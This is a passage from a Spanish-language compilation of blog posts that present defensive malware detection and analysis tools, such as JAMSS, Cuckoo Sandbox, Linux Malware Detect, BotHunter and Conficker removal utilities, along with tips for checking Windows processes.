Artículos sobre malware

Published on September 2016 | Categories: Types, Research | Downloads: 51 | Comments: 0 | Views: 470
of 27
Download PDF   Embed   Report

Artículos sobre malware publicados en el blog "El guru de la informática".

Comments

Content

ARTÍCULOS BLOG EL GURU DE LA INFORMÁTICA SOBRE MALWARE

Script para rastrear malware en Joomla!.
Se trata de JAMSS (Joomla! Anti-Malware Scan Script) un script programado para ayudar a todos los administradores de Joomla! a comprobar si su sistema contiene malware, troyanos u otro código malicioso. El script utiliza patrones actuales de fingerprinting para identificar las amenazas malware más comunes, que puedan afectar a Joomla!. Este script no hace ninguna limpieza por su cuenta , solo informa sobre algún código sospechoso en Joomla!. JAMSS no es 100% preciso, tiene algunos falsos positivos por lo que debe ser utilizado con sabiduría y prudencia. Como ejecutarlo:

Se sube el archivo “jamss.php” al webroot de la cuenta de hosting. Se carga el archivo del escáner en el navegador usando una URL como esta: http://www.<nombre del sitio web>.com/jamss.php La secuencia de comandos se ejecutará durante varios segundos, incluso minutos, dependiendo del número de archivos y carga de trabajo del servidor web. Si se desea realizar un análisis en profundidad, que puede detectar las versiones más recientes de malware se utiliza el parámetro DeepScan = 1. Esta función busca en los archivos las funciones de PHP que utiliza el malware. Ejemplo de ejecución en el navegador: http://www. <nombre del sitio web>.com/jamss.php?deepscan=1 Como interpretar los resultados: El script inspecciona código contenido dentro de archivos y trata de identificar posibles códigos maliciosos usando muchas huellas digitales de malware conocido. Una vez que el script ha terminado de ejecutarse, generará y mostrará un informe para su revisión, que puede poseer falsos positivos y que debe ser interpretados con el fin de determinar si algún resultado en particular es una potencial amenaza de malware.

Para cada potencial amenaza, el informe mostrará: la ruta de acceso al archivo en cuestión, el patrón que se adapta al código de malware y una breve descripción de lo que este código podría estar haciendo. Si existe alguna duda acerca de un archivo identificado por JAMSS, el archivo debe ser descargado e inspeccionado para determinar si hay un problema con él. Si existe sospecha de un archivo en Joomla! o archivos de extensiones: se descargaran todos los paquetes ZIP / TAR.XX y se comprobaran. A continuación, se remplazara el archivo sospechoso por el original correspondiente de Joomla ! y con la misma versión que se está ej ecutando. Si el archivo sospechoso no existe en los archivos originales de instalación de Joomla! o en los archivos de extensiones, se puede mover a una nueva carpeta segura (protegida por contraseña, o con permisos restrictivos) para que nadie tenga acceso y luego eliminarlo por completo, una vez que se determina que es un archivo que no necesita para el funcionamiento de Joomla!. En caso de dudas sobre archivos o extensiones que pertenecen a Joomla!, o qué hacer en caso de una infección, es muy recomendable utilizar los foros de Joomla!: http://forum.joomla.org/viewtopic.php?f=621&t=582854 Y no realizar alguna acción que pueda comprometer la disponibilidad de nuestro sitio web. JAMSS es un script para usar con ciertos conocimientos de PHP y como un análisis rápido de malware. Más información y descarga de JAMSS: https://github.com/btoplak/Joomla-Anti-Malware-Scan-Script/tree/forum Servicio Web que permite averiguar si una URL contiene spyware o malware. http://vtroger.blogspot.com.es/2013/08/servicio-web-que-permite-averiguar-si.html

Aplicación para montar fácilmente un laboratorio de análisis de malware.
Cuckoo Sandbox es un sistema de análisis de malware de código abierto. Esta aplicación permite analizar cualquier archivo sospechoso y en cuestión de segundos, Cuckoo proporcionará resultados detallados que describen lo que resultaría cuando se ejecuta dentro de un entorno aislado. El malware es la principal herramienta de los cibercriminales y de los principales ciberataques en organizaciones empresariales. En estos tiempos la detección y eliminación de malware no es suficiente: es de vital importancia entender: cómo funcionan, lo que harían en los sistemas cuando se despliega, comprender el contexto, las motivaciones y los objetivos del ataque. De esta manera entender los hechos y responder con mayor eficacia para protegerse en el futuro. Hay infinidad de contextos en los que se puede necesitar implementar un entorno limitado, desde el análisis de una violación interna, recolectar datos procesables y analizar posibles amenazas. Cuckoo genera un puñado de diferentes datos brutos, que incluyen:

• • • • • •

Las funciones nativas y API de Windows llamadas huellas. Las copias de los archivos creados y eliminados del sistema de ficheros. Volcado de la memoria del proceso seleccionado. Volcado completo de memoria de la máquina de análisis. Capturas de pantalla del escritorio durante la ejecución del análisis de malware. Volcado de red generado por la máquina que se utiliza para el análisis.

A fin de que tales resultados sean mejor interpretados por los usuarios finales, Cuckoo es capaz de procesar y generar diferentes tipos de informes, que podrían incluir: • • • • • Informe JSON. Informe HTML. Informe MAEC. Interfaz de MongoDB. Interfaz HPFeeds.

Lo más interesante, es que gracias a la amplia estructura modular del Cuckoo, es posible personalizar tanto el procesamiento y la fase de presentación de informes. Cuckoo proporciona todos los requisitos para integrar fácilmente un entorno aislado con los sistemas existentes, con los datos que se deseen, de la manera que desee y con el formato que desee. Más información y descarga de Cuckoo Sandbox: http://www.cuckoosandbox.org/ Documentación de Cuckoo Sandbox: http://docs.cuckoosandbox.org/en/latest/ Herramienta de análisis de malware: http://vtroger.blogspot.com.es/2010/05/herramienta-de-analisis-de-malware.html

Herramientas de análisis de Malware en servidores y páginas Web.
Uno de los principales focos de infección de malware son las páginas web. En este post tratare sobre dos herramientas para detectar malware en servidores y páginas web. Webserver Malware Scanner: Es un simple script para la detección y el análisis de las amenazas basadas en la Web. En la actualidad se encarga de: exploitkits, shells, códigos de JavaScript ofuscado, ejecutables, iframes y escaneo de puertos.

Entre sus características destaca: • Analizar en busca de los usuarios infectados DirectAdmin.

• • • • • • •

Analizar en busca de puertos abiertos vulnerables. Analizar en busca de exploits recientes. Analizar en busca de blogs WordPress infectados. Exploración para detectar la infección en archivos .Html y. Php. Analizar en busca de javascript ofuscado en iframes. Analizar en busca de malware en iframes. Analizar en busca de shells PHP.

Más información y descarga: http://sourceforge.net/projects/smscanner/ Linux Malware Detect: Es un escáner de malware para Linux publicado bajo la licencia GNU GPLv2, que se ha diseñado en torno a las amenazas en entornos hosting compartido. Utiliza datos de amenazas de los sistemas de detección de intrusiones de red IPS, para extraer el malware que está siendo utilizado activamente en los ataques y genera firmas para la detección. Además, los datos de amenazas también se deriva de envíos de los usuarios con la función checkout LMD y de recursos de la comunidad de malware. Las firmas que utiliza LMD son hashes md5 y coincide con el patrón HEX, también se pueden exportar fácilmente a cualquier número de herramientas de detección, como ClamAV. La principal baza de LMD es que en la actualidad existe una disponibilidad limitada de herramientas gratuitas para los sistemas Linux que se centran en la detección de malware. Muchos de los productos antivirus que realizan la detección de malware en Linux tienen un historial muy pobre de detección de amenazas, especialmente los destinados a los entornos de hosting compartido. Características: • Archivo MD5 hash para la detección rápida e identificación de amenazas. • Patrón de juego basado en HEX para identificar variantes de amenazas. • Componente estadístico de análisis para la detección de amenazas ofuscadas (por ejemplo: base64). • Detección integrada de ClamAV para utilizar como motor de escáner para un rendimiento mejorado. • Integrado función de actualización de firma con-u |-update. • Integrado con función de actualización de versión-d |-update-ver. • Opción de exploración reciente para analizar sólo los archivos que se han añadido o cambiado en X días. • Opción de exploración de ruta completa.

• Opción de envió de sospecha de software malicioso a rfxn.com para su revisión. • Sistema de información completo para ver los resultados del análisis actual y anterior.

• Posee cola de cuarentena que almacena las amenazas de una forma segura, sin permisos. • Opción de procesamiento por lotes de cuarentena para poner en cuarentena los resultados de análisis actuales o anteriores. • Opción para restaurar los archivos a la ruta original. • Normas para la eliminación de cadenas inyectadas de malware. • Opción de procesamiento por lotes de limpieza para intentar la limpieza de informes de análisis anteriores. • Normas para eliminar base64 y gzinflate (software malicioso inyectado en base64). • Análisis diario de todos los cambios de los últimos 24h de los directorios de usuario. • Kernel monitor de inotify que puede tomar datos de la trayectoria de STDIN o FILE. • Cómoda función de monitor inotify del kernel para supervisar los usuarios del sistema. • Monitor inotify del núcleo puede ser restringido a una raíz HTML configurable por el usuario. • Kernel monitor de inotify con sysctl límites dinámicos para un rendimiento óptimo. • Inotify del kernel de alerta a través de informes semanales diarios o opcionales. • E-mail información de alerta después de cada ejecución de la exploración (manual y diario).

La diferencia clave con LMD es que no se limita a detectar el malware basado en firmas hashes que alguien genera sino más bien se trata de un proyecto global que rastrea activamente en las amenazas y genera firmas en base a esas amenazas del mundo real que actualmente están circulando . Hay cuatro fuentes principales para los datos de malware que se utiliza para generar firmas LMD: • Red de IPS: Una red formada por 35.000 sitios web y como tal recibe una gran cantidad de atauqes diarios, todo lo cual está registrado por IPS. Los eventos IPS se procesan para extraer la url malware, se clasifican y luego se generan firmas en su caso. La gran mayoría de las firmas LMD se han derivado de IPS que extrajeron los datos. • Datos de la Comunidad: Los datos se recogen de varios sitios web con comunidades que hablan de malware como clean-mx y malwaredomainlist y luego son procesados para recuperar el nuevo malware, revisar, clasificar y luego generar firmas.

• ClamAV: el hexágono MD5 y firmas de detección de ClamAV se monitorean las actualizaciones pertinentes que se aplican al grupo de usuarios de la LMD y se añaden al proyecto, según corresponda. Hasta la fecha ha habido aproximadamente 400 firmas portadas de ClamAV mientras que el proyecto LMD ha contribuido de nuevo a ClamAV mediante la presentación de más de 1.100 firmas y continúa haciéndolo de manera continua. • Envío de los usuarios: LMD tiene una función de comprobación que permite a los usuarios enviar sospecha de malware para opinión, esto se ha convertido en una característica muy popular y genera en promedio alrededor de 30 a 50 presentaciones por semana.

La firma LMD se actualiza normalmente una vez al día o con más frecuencia dependiendo de los datos de amenazas entrantes de la función checkout LMD, la extracción de malware IPS y otras fuentes. La actualización de las firmas en las instalaciones de LMD se realiza diariamente a través de la secuencia de comandos por defecto cron.daily con la opción de actualización, que se puede ejecutar manualmente en cualquier momento. Más información y descarga de LMD: http://www.rfxn.com/projects/linux-malware-detect/

Herramienta para monitorizar procesos en busca de malware.
Se trata Procces Hacker una herramienta para sistemas Windows muy potente y polivalente que ayuda a monitorizar procesos, recursos del sistema, depurar software y detectar malware. Entre sus características principales destaca:

• Una descripción detallada de la actividad de los procesos que corren en el sistema resaltando los más importantes. • Utiliza gráficos y estadísticas que permiten localizar rápidamente los procesos que más recursos consumen y los que sobrecargan la CPU. • Descubre los procesos que están utilizando un archivo, esto nos permite saber porque no se puede eliminar un archivo determinado. • Permite ver qué procesos tienen conexiones de red activas con detalles como: puerto, ip de destino, ancho de banda… • Obtener información en tiempo real sobre el acceso a disco. • Puede ver trazas detalladas con kernel-mode, WOW64 y .NET. • Crear, modificar y controlar los servicios de Windows. • Muestra máscaras simbólicas de acceso (por ejemplo Read y Write ), en lugar de números (por ejemplo 0x12019f ). Esta herramienta combinada con la web ProcessLibrary un recurso gratuito de Uniblue Systems Ltd. que proporciona información acerca de los procesos y DLLs que se encuentran en los sistemas

Windows y que cuenta con una amplia base de datos y se actualiza regularmente con más de 195.000 entradas; forman una combinación excelente para detectar malware en un sistema Windows. Más información y descarga de Procces Hacker: http://processhacker.sourceforge.net/

Servicio online para chequear la seguridad del navegador.
Las vulnerabilidades en los navegadores suelen ser la principal puerta de entrada de malware, por eso, es conveniente tener siempre actualizado el navegador. Pero hoy en día esto no es suficiente debido a que el malware también ataca las vulnerabilidades de los plugins del navegador o utiliza plugins propios.

Existe un servicio llamado Qualys BrowserCheck que permite chequear la seguridad del navegador, este servicio soporta los navegadores: • IE 6.0 y versiones posteriores. • Firefox 3.0 y posteriores. • Chrome 4.0 y posteriores. Es capaz de chequear vulnerabilidades en los siguientes plugins. • • • • • • • • • • Adobe Flash Player. Adobe Reader. Adobe Shockwave Player. Apple Quicktime. BEA JRockit. Microsoft Silverlight. Microsoft Windows Media Player. Real Player. Sun Java. Windows Presentation Foundation (WPF) plugin para Mozilla.

Qualys BrowserCheck avisa de los plugins que no están actualizados y pueden ser potencialmente peligrosos. Web de Qualys BrowserCheck: https://browsercheck.qualys.com/

Herramienta para explorar y eliminar BHO malévolos de Internet Explorer.
Se trata de SpyBHORemover una herramienta para explorar y eliminar BHO malévolos de Internet Explorer. Los BHO (Browser Helper Object) son plugins de Internet Explorer, archivos DLL que amplían las funcionalidades del navegador. Esta característica está siendo empleada por software espía, para supervisar los hábitos de navegación del usuario y para robar sus credenciales.

SpyBHORemover ayuda en la identificación y la eliminación rápida de malware que se aloja como BHO. Para esta labor utiliza análisis heurístico y análisis online utilizando servicios de internet designados a la detección de malware. Entre sus características destaca: • Posee opciones de respaldo permite al usuario quitar y reinstalar BHO todas la veces que quiera. • Verificación en línea de el BHO malévolo usando: VirusTotal, ThreatExpert y ProcessLibrary . • Exhibe la información detallada para cada BHO instalado: nombre de clase de BHO, información del análisis, compañía, nombre de producto, fecha de instalación, CLSID del BHO y trayectoria del archivo de BHO.

SpyBHORemover es una herramienta portable independiente que no requiere ninguna instalación. Trabaja en la Windows plataformas a partir de Windows Xp al último sistema operativo, Windows 7. Más información y descarga de SpyBHORemover: http://www.securityxploded.com/bhoremover.php

Herramienta de análisis de malware.
Se trata de Zero Wine una herramienta bajo licencia GLP v2 para analizar dinámicamente el comportamiento del malware. Esta herramienta basa su funcionamiento en cargar el malware con Wine en una jaula virtual y recoge la información sobre los APIs llamados por el malware. La salida generada por Wine (usando la variable de entorno de eliminación de errores WINEDEBUG) pertenece a las llamadas de las API usadas por el malware. Con esta información, se analiza el comportamiento del malware.

Se distribuye el Zero Wine en una imagen de la máquina virtual QEMU con un sistema operativo Debian instalado. La imagen contiene software para cargar y para analizar el malware y para

generar los informes basados en la información recopilada (este software se almacena en /home/malware/zerowine). Para correr Zero Wine se utiliza un script que carga la maquina virtual y lanza un servicio web en el puerto 8000 en dicha maquina. Para enviar archivos a analizar se utiliza la aplicación web que corre en el servidor web de la maquina virtual. Existe una versión mejorada de este proyecto se llama Zero Wine Tryouts basado en el mismo motor pero con mejoras en el comportamiento y más opciones. Es una excelente herramienta para analizar malware ya que nos permite ver todas las acciones que ejecuta el malware en el sistema. Más información y descarga de Zero Wine: http://zerowine.sourceforge.net/ Más información y descarga de Zero Wine Tryouts: http://zerowine-tryout.sourceforge.net/

Analizar librerías DLL agregadas a procesos en busca de malware.
Es una práctica muy habitual en él malware utilizar procesos del sistema para esconder librerías DLL dañinas. Normalmente esta técnica es empleada por programas de spyware. Para descubrir estas librerías DLL se puede utilizar la consola de comandos de Windows (cmd) y el comando “tasklist /m”, que muestra todas las librerías DLL cargadas por los procesos del sistema y con la página ProcessLibrary.com se puede obtener información sobre librerías DLL sospechosas.

Existe una herramienta llamada SpyDLLRemover que simplifica este proceso y permite desactivar las librerías perjudiciales. Esta herramienta escanea los procesos y marca las librerías peligrosas con colores: las peligrosas en rojo, las menos dañinas en naranja y las dudosas en amarillo. En el caso de las marcadas en amarillo es necesario investigar si son dañinas o no, para este fin, se puede utilizar ProcessLibrary.com para obtener información. Esta herramienta está disponible para: Windows Vista, XP y 2003. Para un correcto uso de SpyDLLRemover, es preciso ejecutarlo con una cuenta de administrador del sistema. Más información y descarga de SpyDLLRemover: http://www.rootkitanalytics.com/tools/spy-dll-remover.php ProcessLibrary.com (Ingles): http://www.processlibrary.com/ Como averiguar los servicios que se esconden bajo el proceso Svchost.exe: http://vtroger.blogspot.com/2009/06/como-averiguar-los-servicios-que-se.html

Juego online de preguntas y respuestas sobre seguridad en Internet dirigido a menores.
El Instituto Nacional de Tecnologías de la Comunicación (INTECO) y la iniciativa PantallasAmigas lanzan TriviRal un juego online de preguntas y respuestas sobre seguridad en Internet dirigido a menores. Se trata de un juego de preguntas y respuestas sobre riesgos en Internet, dirigido a menores de un amplio rango de edades (entre 9 y 15 años principalmente). TriviRal combina un triple objetivo de carácter didáctico (que los niños identifiquen algunos de los riesgos a los que se enfrentan en el uso de Internet), lúdico (aprender jugando sobre medidas preventivas a adoptar) e informativo (dar a conocer la existencia de recursos y servicios de ayuda y respuesta así como sensibilización sobre la seguridad y la econfianza en el uso de las TIC por los menores). Los temas tratados son el código malicioso o malware (virus, troyanos y espías), el ciberbullying (acoso entre menores) y el grooming (acoso sexual por adultos). TriviRal está diseñado para que resulte un material educativo adecuado, tanto para uso en el ámbito doméstico, como para su empleo en el contexto escolar. Dispone de un sistema de cómputo y estadísticas que permite analizar los resultados para cada jugador (a elegir entre 1 y 4) y por cada área temática, de manera que ofrece a padres y educadores un método para medir el grado de conocimiento y aprendizaje de los menores. Web de TriviRal: http://www.navegacionsegura.es/

Análisis de documentos PDF en busca de código malicioso.
Los archivos PDF pueden llegar a ser un riesgo de seguridad ya que debido a sus propiedades, en concreto el uso de filtros, permiten esconder información mediante la codificación y compresión de streams. Esta característica es utilizada para esconder código Javascript y explotar las vulnerabilidades del lector PDF y así comprometer la seguridad del sistema. Con la herramienta Origami es posible buscar código malicioso en archivos PDF, con potentes scripts y una interfaz grafica que facilita el análisis. Entre las características de Origami destaca: • Permite explorar documentos a nivel de objeto, buscando código en streams codificados o ofuscados. • Realiza operaciones de alto nivel, tales como: encriptación, desciframiento y firma. • Posee un interfaz grafico para analizar rápidamente en el contenido del documento. Origami contiene un conjunto de scripts para facilitar el análisis y otras tareas: • detectjs.rb: busca código Javascript en el documento.

• embed.rb: agrega un attachment al documento. • create-jspdf.rb: agrega código Javascript a un archivo PDF, que se ejecutara cuando se abra el documento. • moebius.rb: transforma un PDF en moebius. • encrypt.rb: cifra un archivo PDF. Más información y descarga de Origami: http://security-labs.org/origami

Detectar ordenadores zombis en la red local.
En un post anterior he escrito sobre ordenadores zombis y botnet (redes formadas por ordenadores zombis), en este post tratare sobre una herramienta muy eficaz para detectar ordenadores zombis en una red local llamada BotHunter. BotHunter es una herramienta pasiva de supervisión de red, diseñada para reconocer los patrones de comunicación de computadoras infectadas por malware dentro de un perímetro de red. BotHunter está diseñado para seguir los flujos de comunicación entre los activos internos y las entidades externas de una botnet, buscando el rastro de evidencias de los intercambios de datos que se producen en la secuencia de infección del malware. BotHunter consiste en un motor basado en: partes del motor de la versión 2 de Snort y algunas mejoras. Este motor analiza las acciones que ocurren durante el proceso de infección del malware: Exploración del anfitrión. Uso de exploit de ataque. Transferencia del software de control al sistema anfitrión. Diálogo del malware con el servidor C&C, encargado de la coordinación y control del mismo. • Propagación del malware atacando otros host de la red. • Comunicación con la botnet usando P2P (en el pasado usaban para comunicarse el protocolo IRC). • • • • Después de comparar estas acciones con los patrones de infección que tiene en su base de datos, si coincide, es detectada como infección. Entonces BotHunter realiza un informe detallado con todos los acontecimientos y fuentes que desempeñaron un papel durante el proceso de la infección. BotHunter es gratuito y está disponible para las plataformas: • • • • Windows XP/Vista/2003 Server 32 y 64. Linux, probado en distribuciones: Fedora, Red Hat Enterprise Linux, Debian y SuSE. FreeBSD, probado en la versión 7.2. Mac OS X, probado en: Tiger y Leopard, Mac OS 10.4 y 10.5.

BotHunter no es solo una herramienta ideal para la detección de ordenadores zombis en redes locales, también sirve para investigar las fases de infección del malware.

Más información y descarga de BotHunter: http://www.bothunter.net/ Ordenadores zombis: http://vtroger.blogspot.com/2006/02/virus-zombis.html

Nuevas soluciones Anti-Malware.
En un post anterior he escrito sobre nuevas amenazas malware, en este voy a tratar sobre nuevas tendencias en el mundo de los antivirus. Se trata de dos propuestas antivirus totalmente diferentes: • Quttera zero-day, se trata de una solución antivirus que utiliza solo técnicas heurísticas. La mayoría de antivirus compara el código de cada archivo con el código que está en su base de datos de los virus ya conocidos, comúnmente esta técnica se llama sistema de firmas de virus. Quttera utiliza solo método heurístico, esta técnica consiste en descompilar el código del malware para simular que haría en el sistema si se llegara a ejecutar. Casi todos los antivirus tienen un método heurístico, pero a diferencia de Quttera no lo utilizan es su protección en tiempo real solo lo utilizan para escáneres minuciosos. Ventajas: Protección ideal malware reciente y exploits de día 0. Desventajas: Falsos positivos frecuentes, que necesitan de conocimientos avanzados para discernir un malware de una aplicación inocua. Más información y descarga de Quttera zero-day: http://quttera.com/free/ • Panda Cloud Antivirus, es un antivirus basado en la técnica de Cloud Computing. Esta técnica consiste en basar las aplicaciones en servicios alojados de forma externa. De esta forma el antivirus no funciona mediante firmas que se descargan, la lógica de detección y eliminación de malware está en los servidores de Panda. Este antivirus se apoya en Cloud Computing para recoger muestras de infecciones de los equipos y así descubrir nuevas infecciones. Ventajas: Un antivirus ligero que consume pocos recursos. Al delegar la detección y eliminación en los servidores Panda las actualizaciones son inmediatas. Desventajas: Todas las de las técnicas de Cloud Computing, la dependencia de los servicios en línea: conexión, carga del servidor, estado del servidor…. Más información y descarga de Panda Cloud Antivirus: http://www.cloudantivirus.com/default.aspx?lang=spa

Nuevas amenazas de malware: http://vtroger.blogspot.com/2009/05/nuevas-amenazas-de-malware.html Antivirus gratuitos para Windows Vista: http://vtroger.blogspot.com/2007/05/antivirus-gratitos-para-windows-vista.html

Como averiguar los servicios que se esconden bajo el proceso Svchost.exe.
Svchost.exe es para muchos el proceso más misterioso de Windows. Svchost.exe es un nombre de proceso de host genérico para servicios que se ejecutan desde bibliotecas de vínculos dinámicos (DLL). El archivo Svchost.exe se encuentra en la carpeta %SystemRoot%\System32. Durante el inicio, Svchost.exe examina la parte de servicios del Registro para elaborar una lista de los servicios que hay que cargar. Es posible que el sistema ejecute varias instancias de Svchost.exe al mismo tiempo. Cada sesión de Svchost.exe puede contener una agrupación de servicios. Por tanto, se pueden ejecutar distintos servicios dependiendo de cómo y dónde se inicie Svchost.exe. Los grupos de Svchost.exe se pueden identificar en la siguiente clave del Registro:

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Svchost Algunos gusanos se aprovechan de este proceso para camuflarse en el sistema y no ser detectados con una simple exploración de procesos. Existe malware que utiliza esta técnica de camuflaje como los gusanos: Jeefo, Welchia, Assarm y más recientemente el Conficker. Con la herramienta gratuita Svchost Process Analyzer podemos enumerar todos los procesos svchost del sistema y comprobar los servicios que contienen. Aunque existe una forma de comprobarlo, en la consola de comandos mediante las ordenes: “Tasklist /SVC” y “Tasklist /FI "PID eq IdDeProceso" (con las comillas)”. Se obtiene más información y más concisa con Svchost Process Analyzer. Esta herramienta está disponible para: Windows Vista, XP, 2000 y 2003. Para un correcto uso de este analizador del proceso svchost, es preciso ejecutarlo con una cuenta de administrador del sistema. Más información y descarga de Svchost Process Analyzer: http://www.neuber.com/free/svchost-analyzer/index.html Descripción de Svchost.exe en Windows: http://support.microsoft.com/kb/314056/es Herramientas para la detección y desinfección del virus Conficker: http://vtroger.blogspot.com/2009/04/herramientas-para-la-deteccion-y.html

Nuevas amenazas de malware.
Los creadores de malware, cada vez son más ingeniosos a la hora de buscar fuentes de infección para extender sus creaciones. Últimamente se están dando prácticas de infección muy ingeniosas, y en este post voy a destacar dos: El caso de la distribución de copias troyanizadas de Windows 7, tanto en redes P2P como en páginas Web. Aprovechando el lanzamiento de Windows 7 y el interés de los usuarios Windows, por probar el nuevo sistema. Los creadores de malware cuelgan copias troyanizadas de Windows 7 en páginas Web y en redes P2P. Lo más recomendable siempre es no descargar software de fuentes desconocidas y en este caso los que quieran probar Windows 7 lo mejor es siempre descargarlo de su página oficial. Cybercriminals Launch Tainted Windows 7 RC: http://blog.trendmicro.com/cybercriminals-launch-tainted-windows-7-rc/ Página oficial de descarga de Windows 7 RC: http://www.microsoft.com/windows/windows-7/download.aspx O el caso de las maquinas virtuales con sistemas infectados, una nueva práctica que consiste en compartir en internet maquinas virtuales infectadas por troyanos. Estas maquinas infectadas pueden ser un grave problema de seguridad, porque muchas veces, estas maquinas virtuales se ejecutan con conexión a la red local, lo que permite a los troyanos obtener información de la red (puertos, servicios…) e enviar esa información al exterior, sniffar trafico e enviar esa información al exterior, realizar ataques de fuerza bruta o de denegación de servicios o incluir el sistema en una red zombi. Existe una prueba de concepto de este ataque desarrollada por Sergio Castro llamada ViMtruder muy interesante. Lo más recomendable en estos casos es: • No descargar maquinas virtuales de internet si no se confía plenamente de donde proceden. • En caso de redes locales grandes establecer políticas que impidan a los usuarios instalar o transferir maquinas virtuales, sin supervisión del administrador del sistema o departamento de seguridad (si existe). • Monitorizar la red y tener un registro activo de los sistemas que componen la misma. Para poder situar la amenaza a tiempo. • Utilizar un IDS para detectar los posibles ataques producidos por maquinas infectadas. Prueba de concepto ViMtruder de Sergio Castro: http://code.google.com/p/vimtruder/ Anteriores post relacionados con el tema: Técnicas Malware: Falsos programas de seguridad informática: http://vtroger.blogspot.com/2007/06/tcnicas-malware-falsos-programas-de.html Prácticas malware en emule II: http://vtroger.blogspot.com/2007/11/prcticas-malware-en-emule-ii.html

Practicas malware en Emule: http://vtroger.blogspot.com/2007/06/practicas-malware-en-emule.html

Herramientas para la detección y desinfección del virus Conficker.
El virus Conficker es el malware del que más se habla en estos momentos, aunque en principio no es un virus peligroso para los sistemas que infecta sus mutaciones lo han convertido en un virus de propagación rápida. Lo más preocupante que puede tener este virus es el uso de su red zombi que puede estar entre 10 millones de ordenadores infectados. Aunque muchos esperaban el ataque de esta red el 1 abril, era lógico que no se produjese debido a su repercusión mediática, lo más lógico sería realizar este ataque por sorpresa. Los que quieran conocer afondo este virus les dejo un artículo de The Honeynet Project llamado “Know Your Enemy: Containing Conficker”. Aquí van unas herramientas para su detección y desinfección: Escáner online (de la Universidad de Bonn) para detectar las variantes Conficker.B y .C ,la variante A no se puede detectar con este escáner: http://iv.cs.uni-bonn.de/fileadmin/user_upload/werner/cfdetector/ Downatool2 (de la Universidad de Bonn): Los nombres de dominio de diversas variantes de Conficker se pueden utilizar para detectar las máquinas infectadas en una red. Inspirado por el " downatool" de MHL y de B. Enright, Downatool2 puede ser utilizado para generar los dominios para Downadup/Conficker.A. B, y. C. http://iv.cs.uni-bonn.de/uploads/media/downatool2_01.exe Explorador de memoria (de la Universidad de Bonn): Es difícil identificar los archivos que contienen Conficker, porque se embalan y se cifran los ejecutables. Cuando Conficker funciona en memoria, se desempaqueta completamente. Este herramienta explora la memoria y proceso que corre en el sistema y termina los procesos y subprocesos del virus. Esto ayuda a proteger el funcionamiento de los servicios del sistema. http://iv.cs.uni-bonn.de/uploads/media/conficker_mem_killer.exe Detector de archivos y registro (de la Universidad de Bonn): Los nombres de archivo y las claves de Conficker.B y C del registro no son al azar se calculan en base al hostname. En base a esto la herramienta compruebe si hay DLL o claves del registro del virus Conficker. Desafortunadamente, Conficker.A utiliza nombres al azar y no se puede detectar con esta herramienta: http://iv.cs.uni-bonn.de/uploads/media/regnfile_01.exe Explorador de la red (de la Universidad de Bonn): Hay una manera de distinguir las máquinas infectadas basada en el código de error para mensajes RPC: http://iv.cs.uni-bonn.de/uploads/media/scs_exe.zip Vacuna para el virus Conficker A, B, C y D (no siempre funciona): http://iv.cs.uni-bonn.de/uploads/media/nonficker_01.zip

McAfee W32/Conficker Stinger: utilidad para detectar y eliminar el virus Conficker y todas sus variantes. Resulta por tanto indicado para luchar contra: • • • • • • • • • • • W32/Conficker W32/Conficker.gen W32/Conficker.sys W32/Conficker.worm W32/Conficker.worm!inf W32/Conficker.worm!job W32/Conficker.worm.dr W32/Conficker.worm.gen.a W32/Conficker.worm.gen.b W32/Conficker.worm.gen.c W32/Conficker.worm.gen.d

http://vil.nai.com/vil/averttools.aspx Asimismo una de las aplicaciones de escaneo de vulnerabilidades más popular Nessus, cuenta con un plugin (#36036) que está basado en el explorador de la red (de la Universidad de Bonn). Se puede utilizar Nessus para detectar la infección en una red. The Honeynet Project “Know Your Enemy: Containing Conficker”: http://www.honeynet.org/files/KYE-Conficker.pdf Informe Universidad de Bonn: http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker/ Virus zombis: http://vtroger.blogspot.com/2006/02/virus-zombis.html

Eliminar y evitar infecciones de virus que afectan al autorun.
Existe una gran cantidad de malware que utilizan el archivo AUTORUN.INF para ejecutarse e infectar el sistema, la mayoría de este malware se propaga vía memorias USB. Muchos antivirus no manejan eficientemente estos tipos de malware, aunque si suelen detectarlo cuando se ejecuta, no suelen controlar el dispositivo cuando se conecta. En algunos casos cuando lo detectan ya es demasiado tarde. Existen bloqueadores de autorun, pero no son efectivos si se ejecuta el autorun por descuido, entrando en la unidad. Existen aplicaciones que van mas allá del típico bloqueador de autorun, que además examinan la unidad en busca virus, los eliminan de la unidad y del sistema si estuviera infectado. Yo destacaría dos alternativas dentro de este tipo de programas: Ninja Pendisk y Autorun Eater. Son herramientas muy recomendadas como complemento de un antivirus en sistemas en los que utilizan constantemente memorias USB.

Más información y descarga de Ninja Pendisk: http://nunobrito.eu/ninja/ Más información y descarga de Autorun Eater: http://oldmcdonald.wordpress.com/2008/11/27/autorun-eater-v23/ Técnicas de ataque mediante dispositivos USB. http://vtroger.blogspot.com/2008/04/tcnicas-de-ataque-mediante-dispositivos.html

Ingeniería inversa de procesos que corren en Windows.
Podemos realizar ingeniería inversas de procesos en Windows a nivel de API con la herramienta oSpy. Al trabajar a nivel de API permite una vista muy profunda de los procesos, sus comportamientos y ver su código. Con esta herramienta podemos monitorizar los accesos a la red de los procesos: puertos que abre, servicios que emplea… Además podemos simular como afectaría un entorno firewall en un proceso con una función llamada softwalling que permite aplicar reglas firewall al proceso monitorizado. Esta herramienta simplifica un análisis de conexiones de una aplicación ya que no hay que capturar el tráfico y separarlo, como seria en el caso de usar un sniffer. Esta técnica se puede utilizar para analizar procesos sospechosos de malware. Pero también para análisis forense de malware, ya que se detectan las acciones del malware en el sistema, las conexiones de red que establece y a que direcciones las establece. Más información y descarga de oSpy: http://code.google.com/p/ospy/

Eliminar virus que se propagan por Messenger.
El MSN Messenger es uno de los programas de mensajería instantánea más usados, esta circunstancia lo convierte en un buen foco de infección para malware, además de que opera en el sistema operativo más usado y con más malware especifico para el, Windows. Este malware generalmente se propaga enviando archivos a los contactos de la victima, los contactos que reciben el archivo como creen que proviene de una fuente fiable abren el archivo y se infectan. Las actividades a las que se dedica este malware una vez infectado un sistema pueden ser varias: envió masivo de spam, espiar el usuario, convertir el sistema en zombie… Para eliminar este malware del sistema se puede emplear una herramienta específica para este tipo de amenazas para MSN Messenger, se trata de la herramienta MSNCleaner creada por InfoSpyware. Esta herramienta es conveniente usarla en el modo a prueba de fallos. En este modo Windows carga

